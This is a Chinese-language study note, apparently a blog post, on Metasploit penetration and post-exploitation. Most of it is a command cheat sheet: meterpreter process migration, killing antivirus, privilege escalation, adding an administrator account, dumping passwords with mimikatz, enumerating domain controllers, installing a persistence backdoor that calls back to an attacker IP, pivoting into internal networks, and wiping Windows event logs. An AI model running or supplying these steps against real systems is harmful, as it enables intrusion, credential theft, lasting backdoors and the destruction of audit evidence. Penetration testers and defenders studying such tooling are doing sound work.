metasploit基础学习 渗透(拿shell)和后渗透(留后门)
使用metasploit时,要保持更新的好习惯,更新kali源 ,以及漏洞数据库,更新命令:(1)apt-get update:更新软件包的索引源,作用是同步源的软件包索引(2)apt-get upgrade: 升级系统上安装的所有软件包(3)apt-get dist-upgrade: 升级整个linux系统,包括内核升级专业术语(1)Auxiliaries:辅助模块,负责执行扫...
-
使用metasploit时,要保持更新的好习惯,更新kali源 ,以及漏洞数据库,更新命令:
(1)apt-get update:更新软件包的索引源,作用是同步源的软件包索引
(2)apt-get upgrade: 升级系统上安装的所有软件包
(3)apt-get dist-upgrade: 升级整个linux系统,包括内核升级 -
专业术语
(1)Auxiliaries:辅助模块,负责执行扫描,嗅探,指纹识别等功能。
(2)exploit:漏洞利用模块
(3)payload:攻击载荷模块
(4)post:后期渗透模块
(5)encoders:编码工具模块,负责免杀,以防止被杀毒软件,防火墙等安全软件检测出来 -
常用的扫描模块,见图片
-
在使用 nmap模块时,输入nmap -O -Pn或者nmap -O -P0(数字0) 表示不使用ping的方式,可以穿透防火墙。(不太好用)
-
进程迁移:但获取到meterpreter shell 时 ,该shell极其脆弱,可以把它和目标机中的一个稳定进程绑定在一起
命令过程:在meterpreter下进行ps
getpid :查看meterpreter shell的pid,一般吧迁移到explorer.exe的进程中,其比较稳定
migrate 448 :把进程迁移到448进程中
run post/windows/gather/checkvm 命令检查目标机是否运行在虚拟机上
sysinfo 查看目标机的系统信息
idletime 查看目标机最近运行时间。
route 查看目标机完整的网络设置
getuid 查看当前目标主机已经渗透成功的用户名
getsystem 提权
run post/windows/manage/killav 关闭目标主机系统的杀毒软件
run post/windows/manage/enable_rdp 启动目标机的远程桌面协议,即3389
run post/windows/manage/autoroute 查看本地子网情况
background 将当前meterpreter终端隐藏在后台
route add 添加路由命令
run post/windows/gather/enum_logged_on_users 列举当前有多少用户登录了目标机
run post/windows/gather/enmu_applications 列举安装在目标主机上的应用程序 -
提权:
shell 进入shell
chcp 65001 解决进入shell中中文乱码 whoami/groups 查看我们当前的权限 getuid 查看已经获得的权限 systeminfo 查看系统信息,以及已打的补丁 netstat -an 查看开启端口号 net user username password /add windows 中添加用户 net localgroup administrators username /add 把添加的用户添加到管理员组 useradd –g 组名 用户名 linux下添加用户到root组 **使用mimikatz抓取密码**:用于在meterpreter模式下提权为systerm,在32位的进程中比较强大 (1)在windows 2000 和 windowsxp中无法使用 (2)mimikatz_command -f hash :: (3)kerberos 抓取系统票据 (4)wdigest 获取系统账户信息 查询域名称:net view /domain 查询域内计算机:net view /doamin:xx 查询域控制器时间:net time /domain 查询域管理用户:net group "domain admins" /domain 得到域控制主机名:net group "domain controllers" /domain 获取域控主机名:net group "domain controllers" /domain
创建后门session:
(1)在meterpreter中执行:
persistence后门:
run persistence -A -S -U -i 60 -p 4444 -r 192.168.15.128
创建跳板机实现内网漫游:
在拿到meterpreter 添加路由,以session为跳板:
(1)run get_local_subnets: 获取子网网段
(2)run autoroute -s 192.168.110.0/24
(3)run autoroute -p: 查看路由信息
(4)background : session 后台运行
在这以后跳板机已将创建完成,完成以后对内网的扫描攻击都要在该msf命令框中实现最后:clearrev 清除meterpreter的连接
sessions -K 清除mfssession
在windows下dos窗口清除日志信息:C:\Windows\system32>wevtutil cl security C:\Windows\system32>wevtutil cl system C:\Windows\system32>wevtutil cl application
更多推荐
所有评论(0)